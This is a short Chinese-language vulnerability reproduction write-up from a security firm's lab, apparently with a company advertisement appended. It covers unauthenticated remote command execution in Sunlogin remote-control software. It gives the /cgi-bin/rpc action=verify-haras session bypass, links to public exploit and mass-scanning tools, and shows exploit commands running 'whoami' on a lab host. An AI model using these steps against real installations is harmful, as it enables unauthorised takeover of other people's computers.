向日葵遠(yuǎn)程控制是一款提供遠(yuǎn)程控制服務(wù)的軟件。其支持主流操作系統(tǒng)Windows、Linux、Mac、Android、iOS跨平臺協(xié)同操作,在任何可連入互聯(lián)網(wǎng)的地點,都可以輕松訪問和控制安裝了向日葵遠(yuǎn)程控制客戶端的設(shè)備。整個遠(yuǎn)控過程,可通過瀏覽器直接進(jìn)行,無需再安裝軟件。
· 11.1.1
· 10.3.0.27372
· 11.0.0.33162
復(fù)現(xiàn)版本:10.3.0.27372
1、 訪問掃描開放的端口
2、 需要獲取到session,測試目標(biāo)是否存在/cgi-bin/rpc界面
3、 在/cgi-bin/rpc 中,傳入action=verify-haras參數(shù)即可在未授權(quán)的情況下拿到有效session
4、 使用獲取到的session執(zhí)行系統(tǒng)命令
檢測和利用工具下載地址:https://github.com/Mr-xn/sunlogin_rce/releases/tag/new
1、 運行命令得到漏洞端口:xrkRce.exe -h 192.168.16.128 -t scan
2、 執(zhí)行系統(tǒng)命令:xrkRce.exe -h 192.168.16.128 -t rce -p 49156 -c "whoami"
批量檢測:https://github.com/mrknow001/Sunlogin-rce
本文由創(chuàng)信華通創(chuàng)安攻防實驗室編輯。
本文僅限于個人學(xué)習(xí)和技術(shù)研究,由于傳播、利用此文所提供的信息而造成刑事案件、非授權(quán)攻擊等違法行為,均由使用者本人負(fù)責(zé),本單位不為此承擔(dān)任何責(zé)任。創(chuàng)安攻防實驗室擁有對此文章的修改和解釋權(quán),如欲轉(zhuǎn)載或傳播此文章,必須保證此文章的完整性,包括版權(quán)聲明等全部內(nèi)容。
如有侵權(quán),請聯(lián)系后臺。
成都創(chuàng)信華通信息技術(shù)有限公司成都創(chuàng)信華通信息技術(shù)有限公司自成立以來一直秉承“求真務(wù)實、創(chuàng)新卓越”的文化理念,堅持“開創(chuàng)、誠信、規(guī)范、專業(yè)”的經(jīng)營宗旨,竭盡全力為網(wǎng)絡(luò)安全和國家安全保駕護(hù)航。我司以“等保測評”、“密碼測評、“軟件測試”、“安全服務(wù)”為基礎(chǔ),以綜合服務(wù)為延伸,形成“4+N”的業(yè)務(wù)布局,針對多個行業(yè)形成系統(tǒng)的、全面的解決方案和網(wǎng)絡(luò)安全保障體系。服務(wù)領(lǐng)域包括黨政、政法、醫(yī)療、能源、教育、金融、工業(yè)互聯(lián)網(wǎng)以及關(guān)鍵信息基礎(chǔ)設(shè)施等多個方面。期待與您的合作!